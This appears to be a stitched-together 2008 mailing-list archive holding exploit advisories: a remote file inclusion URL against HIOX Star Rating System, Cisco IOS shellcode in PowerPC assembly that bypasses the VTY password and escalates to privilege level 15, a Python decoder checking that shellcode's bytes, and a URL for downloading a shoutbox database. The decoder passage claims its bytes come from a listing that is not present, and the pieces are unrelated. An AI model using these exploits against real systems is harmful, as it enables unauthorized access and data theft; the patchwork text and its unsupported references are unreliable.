[~] My Email : [EMAIL PROTECTED]  |/ /\ \|
[~] Name Script : HIOX Star Rating System 1.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#[ I love the Messenger of Allah Mohammad ]#
[~] Error (addcode.php) :
include "$hm/auth/config.php";
[~] Exploit :
http://.com/[path]/addcode.php?hm=Evil_Code
#[ I love the Messenger of Allah Mohammad ]#
[~] Greetz :
Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,

 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)


Cisco IOS shellcode explanation

2008-07-30 Thread Andy Davis
Hi,

Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:

.equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis     4,vty_info@ha
la      4,vty_info@l(4)
xor     8,8,8        //Clear r8
lwzx    7,4,8        //Get pointer to VTY info structure
stw     8,372(7)     //Write zero to first offset to remove
                     //the requirement to enter a password
subi    8,8,1        //Set r8 to be 0x
addi    7,7,233      //Add second offset in two steps to
                     //avoid nulls in the shellcode
stw     8,1226(7)    //Write 0x to second offset to
                     //priv escalate to level 15
                     //(technically this should be 0xff10
                     //but 0x works and is more efficient)
mr      3,8          //Use 0x as a parameter
                     //to pass to terminate()
lis     4,terminate@ha
la      4,terminate@l(4)
mtctr   4
bctr                 //terminate "this process"
                     //(current connection to the FTP server)


Cheers,

Andy
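When reviewing a published PoC, the first thing an analyst checks is whether the listing's comments match the bytes, and the thread above (this post and the follow-up "Cisco IOS shellcode explanation - additional", which says the `addi 7,7,233` comment should read 2330 and gives the two structure offsets as 0x174 and 0xde4) is a good test case. The decoder below is an added example, not Andy Davis's code: it decodes the PowerPC D-form instructions (`addi`, `addis`/`lis`, `lwz`, `stw`) from the encoded words that appear in the exploit's `sendbuf`, shows that the `stw` displacements are 372 (0x174) and 1226, that the `addi` immediate is 2330 rather than 233, that 2330 + 1226 is 0xde4, and that the `lis`/`la` pair really assembles `vty_info`. The words are copied from the listing on this page; nothing else is assumed.

```python
"""PowerPC D-form decoder used to check the shellcode comments against the
encoded bytes in the published exploit. Added example, not Andy Davis's code;
the words below are copied from the exploit listing on this page."""
import struct

# Primary opcode -> mnemonic for the D-form instructions used in the listing.
D_FORM = {14: "addi", 15: "addis", 32: "lwz", 36: "stw"}


def decode_dform(word):
    """Decode a 32-bit instruction word as (mnemonic, rT/rS, rA, signed D),
    or None when the primary opcode is not one of the D-form ops above
    (xor, lwzx, mr, mtctr and bctr are X/XFX/XL-form and are skipped)."""
    opcode = word >> 26
    if opcode not in D_FORM:
        return None
    rt = (word >> 21) & 0x1F
    ra = (word >> 16) & 0x1F
    d = word & 0xFFFF
    if d & 0x8000:          # D is a sign-extended 16-bit immediate
        d -= 0x10000
    return (D_FORM[opcode], rt, ra, d)


def words(blob):
    """Split a big-endian byte string into 32-bit instruction words."""
    return [w for (w,) in struct.iter_unpack(">I", blob)]


# The first eight words of the exploit's sendbuf, copied from the listing.
SHELLCODE = (b"\x3c\x80\x81\x83"   # lis   4,vty_info@ha
             b"\x38\x84\xda\x60"   # la    4,vty_info@l(4)
             b"\x7d\x08\x42\x78"   # xor   8,8,8      (not D-form)
             b"\x7c\xe4\x40\x2e"   # lwzx  7,4,8      (not D-form)
             b"\x91\x07\x01\x74"   # stw   8,372(7)
             b"\x39\x08\xff\xff"   # subi  8,8,1      (addi with D = -1)
             b"\x38\xe7\x09\x1a"   # addi  7,7,???    <- the comment under test
             b"\x91\x07\x04\xca")  # stw   8,1226(7)


def immediate_of(blob, index):
    """Signed D field of the index-th word, or None if it is not D-form."""
    decoded = decode_dform(words(blob)[index])
    return decoded[3] if decoded else None


def lis_la_address(lis_word, la_word):
    """Reconstruct the 32-bit address built by a lis/la (addis/addi) pair."""
    hi = decode_dform(lis_word)[3]
    lo = decode_dform(la_word)[3]
    return ((hi << 16) + lo) & 0xFFFFFFFF


def second_offset(blob):
    """Structure offset actually reached by the addi step plus the stw
    displacement, i.e. the 'two steps' the comment describes."""
    return immediate_of(blob, 6) + immediate_of(blob, 7)


if __name__ == "__main__":
    for i, w in enumerate(words(SHELLCODE)):
        print("%08x" % w, decode_dform(w) or "(not D-form)")
    print("first offset: %#x" % immediate_of(SHELLCODE, 4))
    print("second offset: %#x" % second_offset(SHELLCODE))
    print("vty_info: %#x" % lis_la_address(*words(SHELLCODE)[:2]))
```

The `lis`/`la` reconstruction is the same arithmetic the assembler does for `@ha`/`@l`: because the low half 0xda60 is negative as a signed 16-bit value, the high half has to be 0x8183 rather than 0x8182, which is why the first word in the listing is `3c 80 81 83`.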


shoutbox Remote Database Dawnload Exploit

2008-07-30 Thread Ghost hacker


##
 shoutbox Remote Database Dawnload Exploit
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
##
[~] Found by : Ghost Hacker|,  .-.  .-.  ,|
[~] HomePage : http://gh0st10.wordpress.com| )(_o/  \o_)( |
[~] My Email : [EMAIL PROTECTED]  |/ /\ \|
[~] Name Script : shoutbox
[~] Download : http://www.designplace.org/download.php?file=shoutbox.zip
##
[~] Exploit :
http://.com/[path]/db/shoutdb.mdb
##
[~] Greetz :
Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & All Members Real Hack & Arabs Security 
And All My Friends
##
 Viva Real hack Viva Real hack
##